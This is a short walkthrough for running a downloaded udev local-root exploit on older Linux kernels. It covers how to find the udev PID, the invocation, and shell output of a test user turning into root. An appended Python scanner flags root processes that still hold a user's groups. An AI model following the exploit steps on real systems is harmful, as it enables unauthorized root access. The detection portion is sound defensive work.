1. Create a test account on the Linux system.
2. Download the script from http://milw0rm.com/exploits/8478
3. Find the udev PID.
Method 1: first run cat /proc/net/netlink
ffff810077587400 15 364 ffffffff 0 0 0000000000000000 2
ffff810037f810001000 16 0 00000000 0 0 0000000000000000 2
ffff810077078400 18 0 00000000 0 0 0000000000000000 2
The 364 in the third column is the value for udev.
Method 2:
Alternatively, it is best to get the udev PID (365 here) with ps aux | grep udev, subtract 1, and pass the result to the script as its parameter.
Then, in the test user's current directory, run the following:
[haha@localhost ~]$ id
uid=501(haha) gid=502(haha) groups=502(haha)
[haha@localhost ~]$ sh a 364
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.1# id
uid=0(root) gid=0(root) groups=502(haha)
At this point the UID has changed to 0: the test user has become root. You can continue as follows:
sh-3.1# bash
[root@localhost ~]#
Look! The test user has been transformed into root!
About my test version:
[root@localhost ~]# uname -
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:14 EST 2007 x86_64 x86_64 x86_64 GNU/Linux
So far RH5, Ubuntu and Debian have passed the test, but TurboLinux has not.
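
On the detection side, the id output after the escalation (uid=0 and gid=0, but groups still 502(haha)) is a usable hunting signal: a root process that kept an unprivileged user's supplementary groups. The Python below is an added example, not part of the original page or of the downloaded script; the function names, the heuristic and the sample status texts are assumptions constructed for illustration.

```python
import glob

def parse_status(text):
    """Pull Name, Uid and Groups out of the text of /proc/<pid>/status."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.split()
    return {
        "name": " ".join(fields.get("Name", [])),
        "uids": [int(u) for u in fields.get("Uid", [])],      # real, effective, saved, fs
        "groups": [int(g) for g in fields.get("Groups", [])],  # supplementary groups
    }

def root_with_foreign_groups(st):
    """Heuristic (an assumption, not proof of compromise): all four UIDs are 0,
    yet the supplementary group list is non-empty and does not contain gid 0."""
    return (len(st["uids"]) == 4 and all(u == 0 for u in st["uids"])
            and bool(st["groups"]) and 0 not in st["groups"])

def scan_proc(pattern="/proc/[0-9]*/status"):
    """Return (pid, name, groups) for every live process matching the heuristic."""
    hits = []
    for path in glob.glob(pattern):
        try:
            with open(path) as fh:
                st = parse_status(fh.read())
        except (OSError, ValueError):
            continue  # process exited mid-scan or status was unreadable
        if root_with_foreign_groups(st):
            hits.append((path.split("/")[2], st["name"], st["groups"]))
    return hits

# Constructed status excerpts (not captured from a real host).
ESCALATED = "Name:\tsh\nUid:\t0\t0\t0\t0\nGid:\t0\t0\t0\t0\nGroups:\t502 \n"
ROOT_LOGIN = "Name:\tbash\nUid:\t0\t0\t0\t0\nGid:\t0\t0\t0\t0\nGroups:\t0 1 2 3 4 6 10 \n"
DAEMON = "Name:\tcrond\nUid:\t0\t0\t0\t0\nGid:\t0\t0\t0\t0\nGroups:\t\n"
USER = "Name:\tbash\nUid:\t501\t501\t501\t501\nGid:\t502\t502\t502\t502\nGroups:\t502 \n"

if __name__ == "__main__":
    for pid, name, groups in scan_proc():
        print(f"pid {pid} ({name}): uid 0 with supplementary groups {groups}")
```

A hit is a lead for triage rather than a verdict: check the process's parent and start time against known administrative sessions before treating it as an escalation.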